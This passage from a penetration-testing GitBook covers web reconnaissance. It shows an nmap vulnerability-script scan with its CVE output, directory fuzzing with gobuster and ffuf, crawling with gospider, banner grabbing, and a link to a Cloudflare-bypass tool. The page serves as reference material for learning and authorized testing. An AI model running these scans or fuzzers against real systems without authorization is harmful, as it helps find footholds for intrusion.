{% embed url="<https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/webconfig.txt>" %}

{% embed url="<https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/git_config.txt>" %}

### SQL files

{% embed url="<https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/sql.txt>" %}

## Vulnerability Assessment

{% content-ref url="/pages/Nzygyq2EDupbf0SJBJkV" %}
[Vulnerability Scanners](/0xss0rz/pentest/tools/vulnerability-scanners.md)
{% endcontent-ref %}

{% content-ref url="/pages/gz8RUAKUyAyO1jJkDVU1" %}
[Port Scan](/0xss0rz/pentest/protocols/port-scan.md)
{% endcontent-ref %}

```shell-session
sudo nmap 10.129.2.28 -p 80 -sV --script vuln 

Nmap scan report for 10.129.2.28
Host is up (0.036s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-enum:
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2
|   /: WordPress version: 5.3.4
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| vulners:
|   cpe:/a:apache:http_server:2.4.29:
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715
```

{% embed url="<https://github.com/scmanjarrez/CVEScannerV2>" %}

{% embed url="<https://github.com/vulnersCom/nmap-vulners>" %}

### Lostfuzzer

{% embed url="<https://github.com/coffinxp/lostfuzzer>" %}

## Admin interface

{% content-ref url="/pages/lPfVbJctPeqTcOjUhbgQ" %}
[Password lists](/0xss0rz/pentest/brute-force/password-lists.md)
{% endcontent-ref %}

## CMS

{% embed url="<https://github.com/Tuhinshubhra/CMSeeK>" %}

{% content-ref url="/pages/BNYnMWR6ycmbnuzzgqLK" %}
[CMS](/0xss0rz/pentest/web-attacks/cms.md)
{% endcontent-ref %}

## Crawling

### Crawl with 2 separate user-agents

Always crawl with two separate User-Agent headers, one for desktop and one for mobile devices, and look for differences in the responses!

```
gospider -s "http://app.example.com" -c 3 --depth 3 --no-redirect --user-agent "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X..." -o mobile_endpoints.txt
```

<figure><img src="/files/5MOHdgjN97dALVquvwq3" alt=""><figcaption></figcaption></figure>

### Gospider

{% embed url="<https://github.com/jaeles-project/gospider>" %}

{% embed url="<https://blog.intigriti.com/hacking-tools/hacker-tools-gospider>" %}

### Hakrawler

{% embed url="<https://github.com/hakluke/hakrawler?s=03>" %}

### With Burp

{% embed url="<https://portswigger.net/burp/documentation/desktop/automated-scanning/webapp-scans/full-crawl-and-audit>" %}

### With Zap

{% embed url="<https://www.zaproxy.org/>" %}

```
sudo snap install zaproxy --classic
```

* Spidering

<figure><img src="/files/8pcoTb2JBZMbexr2wcKJ" alt=""><figcaption></figcaption></figure>

* Fuzzing

<figure><img src="/files/31N0wKgpciDwyC6hL7Le" alt=""><figcaption></figcaption></figure>

## Fuzz

[Wordlists](#wordlists)

{% content-ref url="/pages/uDePbcQDhOjtjRKV8h1f" %}
[Fuzzing](/0xss0rz/pentest/web-attacks/fuzzing.md)
{% endcontent-ref %}

```
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt
```

```shell-session
ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
```

```shell-session
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://192.168.10.10/FOLDERS/WORDLISTEXTENSIONS
```

#### Admin interface => [Password guessing](/0xss0rz/pentest/brute-force/password-lists.md)

#### [CMS](/0xss0rz/pentest/web-attacks/cms.md)

## Banner grabbing

```
curl -IL https://www.inlanefreight.com
```

Tools: EyeWitness (<https://github.com/FortyNorthSecurity/EyeWitness>) or Aquatone

{% content-ref url="/pages/ziUET1mKbgC3HbH4BP0f" %}
[Information Gathering](/0xss0rz/pentest/recon/information-gathering.md)
{% endcontent-ref %}

```
whatweb 10.10.10.121
whatweb --no-errors 10.10.10.0/24
```

## DNS Subdomain Enumeration

{% content-ref url="/pages/SCrO3Y5edNNTmZbcS19w" %}
[DNS Subdomain Enumeration](/0xss0rz/pentest/recon/dns-subdomain-enumeration.md)
{% endcontent-ref %}

## Cloudflare Bypass for Web Scraping

{% embed url="<https://github.com/sarperavci/CloudflareBypassForScraping>" %}

## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp)

[**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

<figure><img src="/files/a876wNYE568SJIfTZVxL" alt=""><figcaption></figcaption></figure>

## Interesting Books

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more.
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them.
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)


